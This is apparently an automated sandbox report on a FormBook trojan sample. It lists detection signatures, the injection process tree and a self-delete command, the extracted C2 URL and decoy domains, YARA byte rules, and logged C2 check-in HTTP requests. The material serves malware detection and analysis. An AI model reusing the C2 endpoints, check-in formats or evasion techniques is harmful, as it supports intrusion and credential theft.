Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report DNPr7t0GMY

Overview

General Information

Sample Name:DNPr7t0GMY (renamed file extension from none to exe)
Analysis ID:432808
MD5:f41951980d050c8fe13c8a2e31e55b94
SHA1:58be890ff4d29b2d17566420c0e455dbfccda9a8
SHA256:12f07790ce9303ed023131642a93d1b62ce4f3d5db8d35ed215d5b2bddc4ff93
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DNPr7t0GMY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\DNPr7t0GMY.exe' MD5: F41951980D050C8FE13C8A2E31E55B94)
    • DNPr7t0GMY.exe (PID: 6588 cmdline: C:\Users\user\Desktop\DNPr7t0GMY.exe MD5: F41951980D050C8FE13C8A2E31E55B94)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4768 cmdline: /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.DNPr7t0GMY.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.DNPr7t0GMY.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.DNPr7t0GMY.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.DNPr7t0GMY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.DNPr7t0GMY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5876

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DNPr7t0GMY.exeVirustotal: Detection: 55%Perma Link
          Source: DNPr7t0GMY.exeMetadefender: Detection: 34%Perma Link
          Source: DNPr7t0GMY.exeReversingLabs: Detection: 60%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: DNPr7t0GMY.exeJoe Sandbox ML: detected
          Source: 4.0.DNPr7t0GMY.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.DNPr7t0GMY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DNPr7t0GMY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: DNPr7t0GMY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DNPr7t0GMY.exe, 00000004.00000002.271750109.000000000113F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb source: DNPr7t0GMY.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jrFIryXeZK\src\obj\Debug\AppDomainTimerSafeHandle.pdb,L source: DNPr7t0GMY.exe
          Source: Binary string: msdt.pdb source: DNPr7t0GMY.exe, 00000004.00000002.272130410.0000000002D50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4x nop then pop edi4_2_00416282
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeCode function: 4x nop then pop ebx4_2_00406A94
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx10_2_00786A95
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi10_2_00796282

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 199.195.117.147:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01 HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3Z+wGMxAxa HTTP/1.1Host: www.painhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1Host: www.thriveglucose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1Host: www.ololmychartlogin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 142.111.47.2 142.111.47.2
          Source: Joe Sandbox ViewIP Address: 23.82.57.32 23.82.57.32
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01 HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BX3Z+wGMxAxa HTTP/1.1Host: www.painhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1Host: www.thriveglucose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1Host: www.ololmychartlogin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: unknownDNS traffic detected: queries for: www.yunlimall.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 17:13:43 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000005.00000000.241683015.0000000008A05000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: DNPr7t0GMY.exe, 00000002.00000002.220254281.00000000032E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
